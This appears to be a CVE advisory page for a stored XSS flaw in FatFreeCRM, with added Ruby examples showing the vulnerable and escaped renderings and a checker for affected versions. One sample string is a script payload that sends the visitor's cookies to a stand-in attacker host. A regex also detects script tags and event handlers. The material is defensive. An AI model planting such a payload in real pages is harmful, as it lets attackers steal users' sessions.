CVE-2018-1000842
published 2018-12-20

Priority: P427
CVSS 3.1: 6.1 (medium), vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS: 1.69% (74.2nd percentile)
FatFreeCRM versions 0.15.0, 0.16.0, 0.17.0 through 0.17.2 and 0.18.0 (see the Affected table below for the full ranges, which also cover releases before 0.14.2) contain a Cross Site Scripting (XSS) vulnerability in commit 6d60bc8ed010c4eda05d6645c64849f415f68d65 that can result in JavaScript execution. The flaw is a stored XSS: content containing a JavaScript payload is saved by the application and the payload executes in end users' browsers when they visit the page that renders it. The vulnerability appears to have been fixed in 0.18.1, 0.17.3, 0.16.4, 0.15.2 and 0.14.2.
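The advisory only says that stored content carrying a JavaScript payload is executed when the page is viewed; it does not name the field or the view involved. The following is an added illustration in plain Ruby, not code from FatFreeCRM or from the fixing commit: it shows the generic shape of that bug (a template that inlines a stored string without escaping, which is what marking a string html_safe does in Rails) next to the escaped rendering that fixes it, plus a crude check for active content. The record body, the template fragments and the regex are all constructed for this example.

```ruby
require "erb"

# Constructed sample record: a free-text CRM field saved verbatim from user
# input. The payload is a textbook stored-XSS probe, not the advisory's payload
# (which the page does not give).
NOTE_BODY = %q{Call back Monday <script>document.location='https://attacker.example/?c='+document.cookie</script>}

# Vulnerable pattern (assumed for illustration): the template trusts the stored
# text and inlines it. Plain ERB does not escape <%= %> output, which mirrors
# rendering an html_safe / raw string in a Rails view.
UNSAFE_TEMPLATE = ERB.new("<div class=\"note\"><%= body %></div>")

# Hardened pattern: HTML-escape at render time so the text is displayed,
# not interpreted as markup.
SAFE_TEMPLATE = ERB.new("<div class=\"note\"><%= ERB::Util.html_escape(body) %></div>")

def render_unsafe(body)
  UNSAFE_TEMPLATE.result_with_hash(body: body)
end

def render_safe(body)
  SAFE_TEMPLATE.result_with_hash(body: body)
end

# Crude triage check to run over rendered pages or stored records: does the
# text carry markup a browser would execute? (script tags, on* handlers,
# javascript: URLs). Not a substitute for a real sanitizer.
ACTIVE_CONTENT = /<\s*script\b|<\s*\w+[^>]*\bon\w+\s*=|javascript:/i

def active_content?(html)
  !!(html =~ ACTIVE_CONTENT)
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{render_unsafe(NOTE_BODY)}"
  puts "safe:   #{render_safe(NOTE_BODY)}"
end
```

The unsafe rendering reproduces the `<script>` element byte for byte, so the browser runs it; the safe rendering turns it into `&lt;script&gt;…` and the check no longer flags it. In a Rails app the equivalent fix is to stop calling `html_safe`/`raw` on user-controlled text, or to pass it through the framework's sanitizer before marking it safe.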

Affected

10 ranges

Vendor      Product       Version range          Fixed in
fatfreecrm  fat_free_crm  >= 0, < 0.14.2         0.14.2
fatfreecrm  fat_free_crm  >= 0.15.0, < 0.15.2    0.15.2
fatfreecrm  fat_free_crm  >= 0.16.0, < 0.16.4    0.16.4
fatfreecrm  fat_free_crm  >= 0.17.0, < 0.17.3    0.17.3
fatfreecrm  fat_free_crm  >= 0.18.0, < 0.18.1    0.18.1
fatfreecrm  fatfreecrm    <= 0.14.1
fatfreecrm  fatfreecrm
fatfreecrm  fatfreecrm    0.15.0 – 0.15.1
fatfreecrm  fatfreecrm    0.16.0 – 0.16.3
fatfreecrm  fatfreecrm    0.17.0 – 0.17.2
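Because the affected ranges are per minor series with a separate fix release in each, a plain "is my version older than 0.18.1" comparison gets the answer wrong for, say, 0.16.3. The following added example (not from the page or the project) encodes the five gem ranges listed above with the RubyGems version classes that ship with Ruby and checks a pinned version, including one read from a Gemfile.lock. The lockfile text is constructed; the `locked_version` helper and its regex are this example's own.

```ruby
require "rubygems" # Gem::Version and Gem::Requirement ship with Ruby

# The fat_free_crm gem ranges exactly as listed in the Affected table above.
AFFECTED_RANGES = [
  [">= 0",      "< 0.14.2"],
  [">= 0.15.0", "< 0.15.2"],
  [">= 0.16.0", "< 0.16.4"],
  [">= 0.17.0", "< 0.17.3"],
  [">= 0.18.0", "< 0.18.1"],
].freeze

# True when the given version string falls inside any affected range.
# Gem::Version handles multi-part and prerelease versions correctly, which
# naive string comparison does not.
def affected?(version)
  v = Gem::Version.new(version)
  AFFECTED_RANGES.any? { |lo, hi| Gem::Requirement.new(lo, hi).satisfied_by?(v) }
end

# Pulls the resolved version of a gem out of Gemfile.lock text. In the lock
# file, resolved specs sit under "specs:" indented by exactly four spaces,
# so a deeper-indented dependency line of the same gem is not matched.
def locked_version(lockfile_text, gem_name = "fat_free_crm")
  m = lockfile_text.match(/^\s{4}#{Regexp.escape(gem_name)} \(([^)]+)\)/)
  m && m[1]
end

# Constructed Gemfile.lock excerpt for the example (not a real project's file).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      fat_free_crm (0.17.2)
        rails (~> 5.2)
LOCK

if __FILE__ == $PROGRAM_NAME
  %w[0.14.1 0.14.2 0.15.1 0.16.3 0.16.4 0.17.2 0.17.3 0.18.0 0.18.1].each do |ver|
    puts "#{ver}: #{affected?(ver) ? 'AFFECTED' : 'ok'}"
  end
  ver = locked_version(SAMPLE_LOCK)
  puts "Gemfile.lock pins #{ver}: #{affected?(ver) ? 'AFFECTED' : 'ok'}"
end
```

Run it against a real lock file with `locked_version(File.read("Gemfile.lock"))`. Note that 0.14.2 through 0.14.x above the fix are not listed as affected on this page, and neither are 0.15.2 and later within their series, which the range table encodes and the checker reproduces.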

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.1     6.1    MEDIUM    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvd     v2.0     4.3    MEDIUM    AV:N/AC:M/Au:N/C:N/I:P/A:N